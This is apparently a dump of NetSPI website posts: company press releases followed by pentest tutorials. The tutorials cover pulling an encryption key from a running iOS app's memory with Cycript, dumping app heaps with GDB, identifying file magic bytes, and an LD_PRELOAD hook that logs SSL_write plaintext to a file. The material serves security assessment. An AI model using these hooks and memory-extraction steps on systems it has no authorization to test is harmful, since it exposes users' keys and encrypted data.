Among those praising these changes is NetSPI’s executive chairman of the board, Scott Hammack. “Sunstone and I commend Deke and the team on what they’ve built,” Hammack stated. “We are looking forward to building on the established blueprint and enhancing the vision and strategy of the organization to maximize the organization’s growth.”

Read more about NetSPI’s leadership team.

About NetSPI

NetSPI is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes both security testing services and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, MN with additional offices in Dallas, Denver, Portland, and New York.  For more information about NetSPI, please visit netspi.com.

About Sunstone Partners

Sunstone Partners is a private equity firm focused on growth equity and growth buyout investments in technology-enabled services businesses. The firm was formed by the spin-out of the growth equity team of Trident Capital, an investment firm with $1.9 billion of capital under management, since 1993. The firm is currently investing out of Sunstone Partners I, LP, a $310 million fund. For more information visit https://www.sunstonepartners.com.

[post_title] => NetSPI Announces Senior Leadership Appointments to Catapult Growth
[post_excerpt] => NetSPI is intensifying its focus in high-growth security and vulnerability management areas while positioning to accelerate long-term market growth.
[post_status] => publish
[post_name] => netspi-announces-senior-leadership-appointments-to-catapult-growth
[post_modified] => 2021-04-14 06:56:50
[guid] => https://www.netspi.com/?post_type=netspi_news&p=13188
[post_type] => post
)

[73] => WP_Post Object
(
[ID] => 13181
[post_author] => 91
[post_date] => 2017-04-18 07:00:42
[post_content] =>

Minneapolis, Minnesota – NetSPI LLC, the leading security testing and vulnerability correlation company, today announced the completion of a strategic growth equity financing led by Sunstone Partners. The investment will allow NetSPI to accelerate development of new products and service offerings, penetrate new verticals, and expand geographically.

NetSPI has grown profitably every year since its founding in 2001, and this financing marks the first institutional capital ever raised by the company. NetSPI currently supports many of the top 10 financial institutions, healthcare providers, and technology companies.

"Our clients are under intense pressure from business, regulatory, and governance perspectives to partner with cybersecurity experts to increase their security posture to safeguard their organization against the volatile and ever-evolving threat landscape. Our solution portfolio comprises a world-class proprietary software platform, CorrelatedVM®, encapsulated with deep professional services expertise which is empowering global organizations to scale and operationalize their security programs," said Deke George, NetSPI's Co-Founder and CEO. "We are looking forward to our partnership with Sunstone Partners given their team's successful track record and experience in cybersecurity."

According to the report "Penetration Testing Market by Testing Service (Network, Web, Mobile, Social Engineering, Wireless, Embedded Devices and Industrial Control System), Deployment Mode (Cloud and On-Premises), Organization Size, Vertical, and Region - Global Forecast to 2021," published by MarketsandMarkets, the penetration testing market is estimated to grow from USD 594.7 Million in 2016 to USD 1,724.3 Million by 2021, at a Compound Annual Growth Rate (CAGR) of 23.7% during the forecast period. 2015 is considered the base year, while the forecast period is 2016–2021.

"We have known NetSPI for several years and have been consistently impressed by the team's culture, product offering, and loyal customer base," said Gustavo Alberelli, Managing Director at Sunstone Partners. "NetSPI's enterprise customers repeatedly stress their satisfaction and growing need for NetSPI's differentiated solutions, especially given the increasing number of connected applications susceptible to vulnerabilities and advanced persistent threats. Security testing continues to be the fastest-growing subsegment within cybersecurity, and we are excited to partner with the NetSPI team to maximize the company's full potential."

As part of the investment, the new board of directors will include Gustavo Alberelli and Michael Biggee, Managing Directors at Sunstone Partners, Scott Hammack, and Stuart Scholly joined by Deke George. Hammack will serve as NetSPI's Executive Chairman. Hammack and Scholly most recently worked with the Sunstone Partners team while serving as CEO and President respectively of Prolexic Technologies, the leading Distributed Denial of Service (DDoS) mitigation provider, which Akamai acquired in February 2014 for $415 million. Mooreland Partners LLC acted as exclusive financial advisor to NetSPI LLC in connection with this transaction.

About NetSPI

NetSPI is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes both security testing services and a software platform, CorrelatedVM®, trusted by many of the Fortune 250. NetSPI's clients consist of financial institutions, healthcare providers, retailers, and technology companies. NetSPI is based in Minneapolis and has additional offices in New York and Portland.

About Sunstone Partners

Sunstone Partners is an investment firm focused on growth equity investments and majority buyouts in technology businesses. The firm is a spin-out of the growth equity team of Trident Capital, a multi-stage investment firm with seven funds and $1.9 billion of capital under management since 1993. The firm is currently investing out of Sunstone Partners I, LP, a fund with $310 million of committed capital. Sunstone Partners is headquartered in the San Francisco Bay Area.

[post_title] => NetSPI Raises Growth Capital From Sunstone Partners
[post_excerpt] => NetSPI LLC, the leading security testing and vulnerability correlation company, today announced the completion of a strategic growth equity financing led by Sunstone Partners.
[guid] => https://www.netspi.com/?post_type=netspi_news&p=13181

[post_date] => 2015-03-09 07:00:56

In my previous blog, iOS Tutorial – Dumping the Application Heap from Memory, I covered how to dump sensitive information from the heap of an iOS application using GDB. This time we will be covering how to use Cycript to accomplish the same goal but using the class-dump-z output to specifically pull out properties or instance variables. This round will be in a more automated fashion by automatically parsing a class dump of the binary and generating the necessary Cycript scripts to pull the specific properties from memory. I will also be releasing another tool to do all of this for you in the near future. Keep an eye on our NetSPI GitHub repo for the latest tools and scripts for when we release it.

If we do not have access to the source code, we must first decrypt the binary so that we can dump its class information. There are several guides out there for decryption, but Clutch is my go-to tool for ease of use, as it also regenerates an IPA file with the decrypted binary in it so you can install it again on a different device if you have to. After we extract and install the new decrypted binary, we can run class-dump-z to get the header information with all the classes, properties, class methods, instance methods, etc.

MAPen-iPad-000314:~ root# ./class-dump-z -z TestApp

[TRUNCATED]

@interface CryptoManager : XXUnknownSuperclass {
@private
	NSData* key;
}
@property(retain, nonatomic) NSData* key;
+(id)CryptoManager;
-(id)init;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context withIV:(BOOL)iv;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context withIV:(BOOL)iv usingIV:(id)iv5;
-(id)cipher:(id)cipher key:(id)key context:(unsigned)context withIV:(BOOL)iv usingIV:(id)iv5 withPadding:(BOOL)padding;
-(void)clearKey;
-(void)dealloc;
-(id)decryptData:(id)data;
-(id)decryptData:(id)data usingIV:(id)iv;
-(id)decryptData:(id)data usingIV:(id)iv withPadding:(BOOL)padding;
-(id)decryptData:(id)data withIV:(BOOL)iv;
-(id)decryptData:(id)data withIV:(BOOL)iv withHeader:(BOOL)header;
-(id)decryptData:(id)data withKey:(id)key;
-(id)decryptString:(id)string;
-(id)decryptString:(id)string withIV:(BOOL)iv;
-(id)decryptString:(id)string withIV:(BOOL)iv withHeader:(BOOL)header;
-(id)decryptString:(id)string withIV:(BOOL)iv withHeader:(BOOL)header withKey:(id)key;
-(id)decryptString:(id)string withKey:(id)key;
-(id)encryptData:(id)data;
-(int)encryptData:(id)data AndAppendToFileAtPath:(id)path initiatedByUnlockOperation:(BOOL)operation error:(id*)error;
-(id)encryptData:(id)data usingIV:(id)iv;
-(id)encryptData:(id)data withKey:(id)key;
-(id)encryptString:(id)string;
-(id)encryptString:(id)string withKey:(id)key;
-(id)hashString:(id)string;
-(id)hashString:(id)string salt:(id)salt;
-(BOOL)isHashOfString:(id)string equalToHash:(id)hash;
-(BOOL)isHeaderValid:(id)valid;
-(id)newHeader;
-(unsigned long)readEncryptedData:(void**)data atPath:(id)path offset:(long)offset length:(unsigned long)length initiatedByUnlockOperation:(BOOL)operation error:(id*)error;
@end

[TRUNCATED]

So you can see above that TestApp has a class called "CryptoManager" with a property called "key". This looks interesting, as there could be an encryption key sitting in memory. We will now use Cycript to grab that specific property from memory. Note that at runtime the "CryptoManager" class is instantiated before login, but only once a valid user has successfully logged in before on the device. Also, the class is never cleared out even when it is no longer needed, such as after the user logs out, which is where the vulnerability lies. In this instance, we have already logged in successfully during a previous session and therefore the class is already in memory before the user logs in.

First we will hook into the running TestApp process from an SSH session so we can leave the application running on the iOS device.

MAPen-iPad-000314:~ root# cycript -p TestApp
cy#

Now that we are hooked in, let's talk about the "choose" method in Cycript. The "choose" method scans the heap for the matching class name and returns an array of objects that match that class's structure. So, if we type "choose(MyClass)", we get an indexed array of all instantiated MyClass objects that are currently in memory (or that match that structure). The output below assigns that array to a variable called "a"; the first object is then reached as index "0". If you like GDB more, you can also take the memory location returned and go back to GDB to dump everything from that sub-region in memory, or set breakpoints and watch the registers. See my previous blog on how to scan the heap here (https://blog.netspi.com/ios-tutorial-dumping-the-application-heap-from-memory/). Note, however, that there can be more than one instance of the class in this array, and you will need to go through each index to get the properties of each instantiated object.

cy# a=choose(CryptoManager)
[#"<CryptoManager: 0x17dcc340>",#"<CryptoManager: 0x17f42ba0>"]

Now let's dump the "key" property from memory so we can grab the key and decrypt any data in the app later on.

cy# a[0].key.hexString
@"6D2268CFFDDC16E890B365910543833190C9C02C4DCA2342A9AEED68428EF9B6"

Bingo! We now have the hexadecimal of the key we need to decrypt anything this application wants to keep encrypted.

Now let's talk about how to automate this, and go over what we know and what we have to figure out programmatically as we go. We know that the class-dump-z output lists all the classes and their properties. What we don't know is whether those classes are currently instantiated, or how many times each is instantiated in memory. What we can do is parse the class-dump-z output and create a map of classes and their properties. With that map we can then generate Cycript scripts to pull the information out for us. Note, however, that this technique is for classes that are already instantiated; we won't be covering how to create a new instance of an object in Cycript, as there are many tutorials and books on how to do that.

So we have to read Cycript's output from the choose method to figure out how many times the object is instantiated in memory. To do that we can use JavaScript to get the array length:

cy# choose(CryptoManager).length
2
cy#

Cool, now we know how many times to loop through the array to pull out all instantiated "CryptoManager" objects. Now let's move on to cycript scripting.

Cycript can take a script as a parameter and a basic script just has to contain the commands we want to run like so:

MAPen-iPad-000314:~ root# cat dump.cy
a=choose(CryptoManager)[0]
a.key.hexString

MAPen-iPad-000314:~ root# cycript -p TestApp dump.cy
@"6D2268CFFDDC16E890B365910543833190C9C02C4DCA2342A9AEED68428EF9B6"

One issue that I can't seem to figure out is Cycript only returns the last line of output to the terminal when you run a script and doesn't return all output. So to pull out multiple classes and their properties from the terminal, you have to create a new script for each class and property combination.  If anyone knows how to get around this limitation, please feel free to reach out to me on how to accomplish this. Or you can write everything in Cycript JavaScript if that is your preferred language.
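The automation described above, as an added example (this is not the tool the post promises): a Python script that parses class-dump-z output into a class-to-property map and writes one Cycript script per class/property pair, each looping over every instance that choose() returns. The sample header text is constructed; only the CryptoManager block mirrors the dump above, and SessionStore and the category are made up for the demo.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of class-dump-z output. Only the CryptoManager
# block mirrors the post; SessionStore and the category are made up for the demo.
SAMPLE_DUMP = """\
@interface CryptoManager : XXUnknownSuperclass {
@private
    NSData* key;
}
@property(retain, nonatomic) NSData* key;
+(id)CryptoManager;
-(void)clearKey;
@end

@interface SessionStore : NSObject {
@private
    NSString* token;
    NSString* username;
}
@property(copy, nonatomic) NSString *token;
@property(copy, nonatomic) NSString *username;
@property(readonly, assign) BOOL isLoggedIn;
-(void)logout;
@end

@interface NSObject (SomeCategory)
@property(retain) id cachedValue;
@end
"""

INTERFACE_RE = re.compile(r"^@interface\s+(\w+)\s*(\([^)]*\))?")
PROPERTY_RE = re.compile(r"^@property\s*(?:\([^)]*\))?\s*(.+?)\s*;")


def parse_class_dump(text: str) -> Dict[str, List[str]]:
    """Map each @interface block to the names of its @property declarations.

    Categories ("@interface Foo (Bar)") are skipped because choose() wants a
    class, and classes without properties are dropped so that no empty
    scripts get generated.
    """
    classes: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = INTERFACE_RE.match(line)
        if m:
            current = None if m.group(2) else m.group(1)
            if current:
                classes.setdefault(current, [])
            continue
        if line == "@end":
            current = None
            continue
        p = PROPERTY_RE.match(line) if current else None
        if p:
            # The last token of the declaration is the property name; strip a
            # leading '*' from declarations written as "NSString *token".
            classes[current].append(p.group(1).split()[-1].lstrip("*"))
    return {cls: props for cls, props in classes.items() if props}


def cycript_script(cls: str, prop: str) -> str:
    """Cycript (JavaScript) that reads one property from every live instance.

    Cycript reports the value of the script's last expression, so the
    per-instance results are collected in an array that is left as that
    final expression instead of relying on one line of output per instance.
    """
    return "\n".join([
        f"var objs = choose({cls});",
        "var out = [];",
        "for (var i = 0; i < objs.length; i++) {",
        f'    out.push("{cls}[" + i + "].{prop} = " + objs[i].{prop});',
        "}",
        "out;",
    ])


def generate_scripts(classes: Dict[str, List[str]]) -> Dict[str, str]:
    """Return {filename: script text} for every class/property pair."""
    return {
        f"dump_{cls}_{prop}.cy": cycript_script(cls, prop)
        for cls, props in classes.items()
        for prop in props
    }


def main() -> None:
    # Usage: python gen_cy.py <class-dump-z output file> [output dir]
    # With no arguments the constructed sample above is parsed instead.
    import sys
    from pathlib import Path

    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_DUMP
    outdir = Path(sys.argv[2] if len(sys.argv) > 2 else "cy_scripts")
    outdir.mkdir(exist_ok=True)
    for name, script in generate_scripts(parse_class_dump(text)).items():
        (outdir / name).write_text(script + "\n")
        print(f"wrote {outdir / name}  (run with: cycript -p TestApp {outdir / name})")


if __name__ == "__main__":
    main()
```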

Thanks for reading and hack responsibly

[post_title] => iOS Tutorial - Dumping the Application Memory Part 2
[guid] => https://netspiblogdev.wpengine.com/?p=2968

[post_date] => 2015-01-05 07:00:47

An essential part of pentesting iOS applications is analyzing the runtime of the application. In this blog, I will be covering how to dump the heap from an iOS application. I will also be releasing a little script to run on the iOS device that dumps the heap of a specified application for you. You can download the script from the NetSPI GitHub.

The script basically wraps around GDB, but only dumps the ranges in memory that have "sub-regions". These sub-regions are usually where I find active credentials, anything that is currently being used in the UI, or instantiated class properties.

This technique currently only works for iOS 7 and lower, until there is a working GDB version for iOS 8. You also cannot use the version of GDB from the default Cydia repositories. You have to use the fixed version in this repository: "https://cydia.radare.org" (direct link to the deb package: "https://cydia.radare.org/debs/gdb_1708_iphoneos-arm.deb").

Below are a few screenshots of the process and how the script works. First, we launch the application that we want to capture the heap for and log in.

[Screenshot: MB_iOS_Dump_1]

After we log into the app, we will keep it at the first main screen, which in this case is the user's timeline.

Now we will SSH into the device, so that we can leave the application running without the app being put in the background by iOS.

[Screenshot: MB_iOS_Dump_2]

Above is the output that the script provides during runtime. Here we are giving the binary name that we want the script to dump.

[Screenshot: MB_iOS_Dump_3]

Above are all the .dmp files that we can now start searching through for the credentials or any other sensitive data. You can usually find encryption keys or passwords from any instantiated classes that use encryption or contain the login process. I personally use a combination of the "strings" command and "xxd" as a hex dumper, but you can use any hex editor that works for you.

This technique can be used to determine whether the application is failing to remove sensitive information from memory once the instantiated classes are done with the data. All applications should deallocate the memory used by classes and methods that handled sensitive information; otherwise you run the risk of the information sitting in memory for an attacker to see.

I've included the GDB commands that are used in the script:
  • gdb --pid="<PID>"
  • info mach-regions (look for sub-regions)
  • dump binary memory heap1.dmp <sub-region range from above>
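To check the resulting .dmp files for data that should have been cleared after logout, here is an added example (not the NetSPI script) that searches dumps for known secrets in both ASCII and UTF-16LE, an encoding NSString may use for its backing store, and prints an xxd-style line around each hit. The sample dump bytes are constructed.

```python
import argparse
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# Constructed sample "heap": one secret stored as ASCII, one as UTF-16LE
# (a common NSString backing store), surrounded by zero bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"password=hunter2!\x00"
    + b"\x00" * 7
    + "sessionKey".encode("utf-16-le")
    + b"\x00" * 9
)


def encodings_of(secret: str) -> List[Tuple[str, bytes]]:
    """Byte patterns a secret is likely to take inside an iOS process heap."""
    return [
        ("ascii", secret.encode("utf-8")),
        ("utf-16le", secret.encode("utf-16-le")),
    ]


def find_secrets(blob: bytes, secrets: Iterable[str]) -> List[Dict]:
    """Every occurrence of every secret, in any encoding, sorted by offset."""
    hits: List[Dict] = []
    for secret in secrets:
        for enc, pattern in encodings_of(secret):
            idx = blob.find(pattern)
            while idx >= 0:
                hits.append({"secret": secret, "encoding": enc, "offset": idx})
                idx = blob.find(pattern, idx + 1)
    return sorted(hits, key=lambda h: h["offset"])


def hexdump_line(blob: bytes, offset: int, width: int = 16) -> str:
    """One xxd-style line covering the hit, so the neighbouring bytes can be eyeballed."""
    start = offset - (offset % width)
    chunk = blob[start:start + width]
    hexpart = " ".join(f"{b:02x}" for b in chunk)
    text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    return f"{start:08x}: {hexpart:<{width * 3}} {text}"


def scan_files(paths: Iterable[str], secrets: List[str]) -> Dict[str, List[Dict]]:
    """Map each dump file that still holds a secret to its list of hits."""
    report: Dict[str, List[Dict]] = {}
    for path in paths:
        hits = find_secrets(Path(path).read_bytes(), secrets)
        if hits:
            report[str(path)] = hits
    return report


def main() -> None:
    ap = argparse.ArgumentParser(description="look for known secrets in heap dumps")
    ap.add_argument("dumps", nargs="+", help=".dmp files written by the GDB script")
    ap.add_argument("--secret", action="append", required=True,
                    help="value that should no longer be in memory (repeatable)")
    args = ap.parse_args()
    for path, hits in scan_files(args.dumps, args.secret).items():
        blob = Path(path).read_bytes()
        for h in hits:
            print(f"{path}: '{h['secret']}' found as {h['encoding']} at 0x{h['offset']:x}")
            print("    " + hexdump_line(blob, h["offset"]))


if __name__ == "__main__":
    main()
```

A clean result on dumps taken after logout is the expected outcome; any hit names the class data that was never cleared.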
[post_title] => iOS Tutorial – Dumping the Application Heap from Memory
[post_excerpt] => Using GDB to dump the runtime heap from memory to gain access to sensitive information that should've been removed.
[guid] => https://netspiblogdev.wpengine.com/?p=2156

[post_date] => 2014-06-30 07:00:00

How many of your projects include open source software? Maybe it is better to call it free software. As someone who has spent time in the corporate world, I understand the appeal of using open source software: much of it is free or very low cost. However, is it secure, and how do you go about proving that it is? For example, OpenSSL had the Heartbleed vulnerability in it for some time before it was discovered and disclosed. If you are using software that was not written by your own company, how do you know it does not contain vulnerabilities that have not yet been discovered or disclosed? Make sure you find out, either by doing the work yourself or through a third party.

We have had many companies tell us not to worry about the results from the open source software because it was not their software and they cannot or will not fix it. If you find vulnerabilities in this open source software, make sure you address them or at least mitigate them.

Right now, I am in the middle of a code review for a company that is using an open source framework. I looked it up and the framework has not been modified since July 2012. The framework they are using is full of vulnerabilities, including SQL injection and cross-site scripting (both persistent and stored). If the person who wrote this code could do it wrong, they did. Out of the 10,000+ vulnerabilities found by the automated code review tool, almost 80% were in the framework. For this company, I am going to recommend working with the framework's author to address these vulnerabilities or trying to find a different framework, preferably one that has been updated recently. I am also going to recommend they look at implementing a web application firewall. If not, they are going to have problems.

This framework is a good example of what not to do. Security vulnerabilities, attacks, programming languages, and tools have evolved to make your application much more secure, but your developers need to understand secure coding techniques. You also need to evaluate the frameworks you are using and not assume they are safe.

[post_title] => Open Source Frameworks - How secure are they?
[guid] => https://netspiblogdev.wpengine.com/?p=1113

[post_date] => 2013-07-08 07:00:25

When assessing an application, one may run into files that have strange or unknown extensions, or files not readily consumed by the applications associated with those extensions. In these cases it can be helpful to look for tell-tale file format signatures, infer how the application is using the files from those signatures, and consider how these formats may be abused to provoke undefined behavior within the application. To identify these common file format signatures one typically need only look as far as the first few bytes of the file in question. These are often called "magic bytes", a term referring to a block of arcane byte values used to designate a file type so that applications can detect whether the file they plan to parse and consume is of the proper format. The easiest way to inspect the file in question is to examine it with a hex editor. Personally, for this task I prefer HxD for Windows or hexdump under Linux, but really any hex editor should do just fine.

With a few exceptions, file format signatures are located at offset zero and generally occupy the first two to four bytes starting from that offset. Another notable detail is that these initial sequences of bytes are generally not chosen at random; that is, most developers of a given format will choose a file signature whose ASCII representation is fairly recognizable at a glance as well as unique to the format. This allows us to use the known ASCII representations of these signatures as a sort of mnemonic device to quickly identify a given file's format. Here are a few examples of common file signatures and their accompanying mnemonics:

Executable Binaries          Mnemonic            Signature
DOS Executable               "MZ"                0x4D 0x5A
PE32 Executable              "MZ"...."PE.."      0x4D 0x5A ... 0x50 0x45 0x00 0x00
Mach-O Executable (32 bit)   "FEEDFACE"          0xFE 0xED 0xFA 0xCE
Mach-O Executable (64 bit)   "FEEDFACF"          0xFE 0xED 0xFA 0xCF
ELF Executable               ".ELF"              0x7F 0x45 0x4C 0x46

Compressed Archives          Mnemonic            Signature
Zip Archive                  "PK.."              0x50 0x4B 0x03 0x04
Rar Archive                  "Rar!...."          0x52 0x61 0x72 0x21 0x1A 0x07 0x01 0x00
Ogg Container                "OggS"              0x4F 0x67 0x67 0x53
Matroska/EBML Container      N/A                 0x45 0x1A 0xA3 0xDF

Image File Formats           Mnemonic            Signature
PNG Image                    ".PNG...."          0x89 0x50 0x4E 0x47 0x0D 0x0A 0x1A 0x0A
BMP Image                    "BM"                0x42 0x4D
GIF Image                    "GIF87a"            0x47 0x49 0x46 0x38 0x37 0x61
                             "GIF89a"            0x47 0x49 0x46 0x38 0x39 0x61

Let's take what we’ve learned so far and apply it toward an "unknown" file, calc.exe.

[Screenshot: calc.exe in a hex editor, DOS header highlighted]

To avoid confusion it's worth noting that the PE32 executable format actually contains at minimum two sets of magic bytes: one set for the DOS executable header, for DOS system compatibility, and the other set to mark the beginning of the PE32 executable header. In this screenshot I've highlighted the DOS header, where we can see that the beginning of said header is marked with "MZ". Another characteristic of the DOS header that's an immediate give-away is the text "This program cannot be run in DOS mode.", which some may recognize as the error text displayed when one attempts to run a Windows application in DOS mode.

[Screenshot: calc.exe in a hex editor, rich header]

Following the DOS header and preceding the PE header is what's known as the rich header and is represented in our mnemonic list as the "..." between the DOS and PE magic bytes. This header remains largely undocumented, however, so examining it at length is unlikely to yield any insightful information.

[Screenshot: calc.exe in a hex editor, PE header]

Finally, following the DOS and rich headers comes the PE header, marked by "PE.." or the byte sequence \x50\x45\x00\x00, which indicates that this file is a PE32 executable. Identifying other formats follows the same principle, only one will generally need just the first step of the above process to identify the file format.
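The table above as a small identifier, added here as an example that is not part of the original post. It goes slightly beyond the table in two places: the PE check follows the e_lfanew field at offset 0x3C to find "PE\0\0" instead of assuming the marker sits a fixed distance after "MZ", and the Mach-O entries also accept the byte-swapped form that little-endian CPUs write to disk. The PE stub used for the demonstration is constructed.

```python
import struct
import sys
from typing import Optional

# (format name, leading bytes) from the post's table, plus the byte-swapped
# Mach-O forms written by little-endian CPUs. First match wins.
SIGNATURES = [
    ("ELF Executable", b"\x7fELF"),
    ("Mach-O Executable (32 bit)", b"\xfe\xed\xfa\xce"),
    ("Mach-O Executable (32 bit)", b"\xce\xfa\xed\xfe"),   # byte-swapped
    ("Mach-O Executable (64 bit)", b"\xfe\xed\xfa\xcf"),
    ("Mach-O Executable (64 bit)", b"\xcf\xfa\xed\xfe"),   # byte-swapped
    ("Zip Archive", b"PK\x03\x04"),
    ("Rar Archive", b"Rar!\x1a\x07\x01\x00"),
    ("Ogg Container", b"OggS"),
    ("PNG Image", b"\x89PNG\r\n\x1a\n"),
    ("BMP Image", b"BM"),
    ("GIF Image", b"GIF87a"),
    ("GIF Image", b"GIF89a"),
]


def mnemonic(data: bytes) -> str:
    """The at-a-glance ASCII form of a signature; unprintable bytes become '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data)


def identify(data: bytes) -> Optional[str]:
    """Name the format of a file from its leading bytes, or None if unknown."""
    # "MZ" marks a DOS executable. A PE32 executable is a DOS stub whose header
    # stores, at offset 0x3C (e_lfanew), where the "PE\0\0" signature begins;
    # the DOS stub and rich header sit in between, which is why the "..." in
    # the table's mnemonic has no fixed length.
    if data[:2] == b"MZ":
        if len(data) >= 0x40:
            (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
            if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "PE32 Executable"
        return "DOS Executable"
    for name, sig in SIGNATURES:
        if data.startswith(sig):
            return name
    return None


def make_pe_stub(pe_offset: int = 0x80) -> bytes:
    """Constructed minimal PE32 prefix: a DOS header whose e_lfanew points at PE\\0\\0."""
    header = bytearray(pe_offset + 4)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, pe_offset)
    header[pe_offset:pe_offset + 4] = b"PE\x00\x00"
    return bytes(header)


def main() -> None:
    # Usage: python magic.py <file> [<file> ...]; only the first 4 KiB is read.
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            head = fh.read(4096)
        hexs = " ".join(f"0x{b:02X}" for b in head[:8])
        print(f"{path}: {identify(head) or 'unknown'}  [{mnemonic(head[:8])!r}  {hexs}]")


if __name__ == "__main__":
    main()
```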

[post_title] => Magic Bytes - Identifying Common File Formats at a Glance
[guid] => https://netspiblogdev.wpengine.com/?p=1154

[post_date] => 2013-07-08 07:00:05

When assessing an application for weaknesses in a Linux environment, we won't always have the luxury of freely available source code or documentation. As a result, these situations require more of a black box approach, where much of the information about the application will be revealed by monitoring things such as network communications, calls to cryptographic functions, and file I/O.

One method of monitoring applications to extract information is to attach a debugger, such as GDB, to the process and dump register or stack values as breakpoints are hit for the desired function calls. While this has the advantage of giving fine-grained control over things such as code flow and register contents, it is also a cumbersome process compared to hooking the function calls of interest to modify their behavior. Function call hooking refers to a range of techniques used to intercept calls to pre-existing functions and wrap around them to modify the function's behavior at runtime.

In this article we'll be focusing on function hooking in Linux using the dynamic loader API, which allows us to dynamically load and execute calls from shared libraries on the system at runtime, and allows us to wrap around existing functions by making use of the LD_PRELOAD environment variable. The LD_PRELOAD environment variable is used to specify a shared library that is to be loaded first by the loader. Loading our shared library first enables us to intercept function calls; using the dynamic loader API we can then bind the originally intended function to a function pointer and pass the original arguments through it, effectively wrapping the function call.

Let's use the ubiquitous "hello world" demonstration as an example. In this example we'll intercept the puts function and change the output. Here's our helloworld.c file:
#include <stdio.h>

int main(void)
{
    puts("Hello world!\n");   /* the call our preloaded library will intercept */
    return 0;
}
Here's our libexample.c file:
#include <stdio.h>
#include <string.h>   /* strcmp */
#include <dlfcn.h>    /* dlsym, RTLD_NEXT (RTLD_NEXT needs _GNU_SOURCE) */

int puts(const char *message)          /* same name and signature as libc's puts */
{
    int (*new_puts)(const char *message);   /* will point at the real puts */
    int result;

    new_puts = dlsym(RTLD_NEXT, "puts");    /* next "puts" in load order: libc's */

    if (strcmp(message, "Hello world!\n") == 0) {
        result = new_puts("Goodbye, cruel world!\n");
    } else {
        result = new_puts(message);         /* anything else passes through unchanged */
    }
    return result;
}
Let's take a moment to examine what's going on in our libexample.c file:
  • Line 5 contains our puts function declaration. To intercept the original puts we define a function with the exact same name and function signature as the original libc puts function.
  • Line 7 declares the function pointer new_puts that will point to the originally intended puts function. As with the intercepting function declaration, this pointer's function signature must match the function signature of puts.
  • Line 10 initializes our function pointer using the dlsym() function. The RTLD_NEXT enum tells the dynamic loader API that we want the next instance of the function named by the second argument (in this case puts) in the load order.
  • We compare the argument passed to our puts hook against "Hello world!\n" on line 12 and, if it matches, replace it with "Goodbye, cruel world!\n". If the two strings do not match we simply pass the original message on to puts on line 15.
Now let's build everything and test it out:
sigma@ubuntu:~/code$ gcc helloworld.c -o helloworld
sigma@ubuntu:~/code$ gcc libexample.c -o libexample.so -fPIC -shared -ldl -D_GNU_SOURCE
sigma@ubuntu:~/code$
First we compile helloworld.c as one normally would. Next we compile libexample.c into a shared library by specifying the -shared and -fPIC compile flags and link against libdl using the -ldl flag. The -D_GNU_SOURCE flag is specified to satisfy #ifdef conditions that allow us to use the RTLD_NEXT enum. Optionally this flag can be replaced by adding "#define _GNU_SOURCE" somewhere near the top of our libexample.c file. After compiling our source files, we set the LD_PRELOAD environment variable to point to the location of our newly created shared library.
sigma@ubuntu:~/code$ export LD_PRELOAD="/home/sigma/code/libexample.so"
After setting LD_PRELOAD we're ready to run our helloworld binary. Executing the binary produces the following output:
sigma@ubuntu:~/code$ ./helloworld
Goodbye, cruel world!
sigma@ubuntu:~/code$
As expected, when our helloworld binary is executed the puts function is intercepted and "Goodbye, cruel world!" rather than the original "Hello world!" string is displayed.

Now that we're familiar with the process of hooking function calls, let's apply it towards a bit more practical example. Let's pretend for a moment that we have an application that we are assessing and that this application uses OpenSSL to encrypt communications of sensitive data. Let's also assume that attempts to man-in-the-middle these communications at the network level have been fruitless. To get at this sensitive data we will intercept calls to SSL_write, the function responsible for encrypting and then sending data over a socket. Intercepting SSL_write will allow us to log the string sent to the function and pass the original parameters along, effectively bypassing the encryption protections while allowing the application to run normally. To get started, let's take a look at the SSL_write function definition:
int SSL_write(SSL *ssl, const void *buf, int num);
Here's the code I’ve written to intercept SSL_write in hook.c:
#include <stdio.h>
#include <unistd.h>       /* getpid */
#include <dlfcn.h>        /* dlsym, RTLD_NEXT (needs _GNU_SOURCE) */
#include <openssl/ssl.h>  /* SSL type */

int SSL_write(SSL *context, const void *buffer, int bytes)
{
    int (*new_ssl_write)(SSL *context, const void *buffer, int bytes);
    new_ssl_write = dlsym(RTLD_NEXT, "SSL_write");   /* the real SSL_write from libssl */

    /* The buffer is not necessarily NUL-terminated, so log exactly the
     * number of bytes the caller asked to send rather than using "%s". */
    FILE *logfile = fopen("logfile", "a+");
    if (logfile != NULL) {
        fprintf(logfile, "Process %d:\n\n", getpid());
        fwrite(buffer, 1, bytes > 0 ? (size_t)bytes : 0, logfile);
        fprintf(logfile, "\n\n\n");
        fclose(logfile);
    }
    return new_ssl_write(context, buffer, bytes);
}
As we can see our function definition needs to return an integer and take three arguments: a pointer to an SSL context, a pointer to a buffer containing the string to encrypt, and the number of bytes to write. In addition to our intercepting function definition we define a matching function pointer that will point to the originally intended SSL_write function and initialize it with the dlsym function. After pointing our pointer to the original function, we log the process ID of the process calling SSL_write, and the string sent to it. Next we compile our source to a shared library:
sigma@ubuntu:~/code$ gcc hook.c -o libhook.so -fPIC -shared -lssl -D_GNU_SOURCE
sigma@ubuntu:~/code$
The only difference between this compilation and last is the -lssl flag, which we specify in order to link our code against the OpenSSL library. Now let's go ahead and set LD_PRELOAD to point to our newly created libhook library:
sigma@ubuntu:~/code$ export LD_PRELOAD="/home/sigma/code/libhook.so"
sigma@ubuntu:~/code$
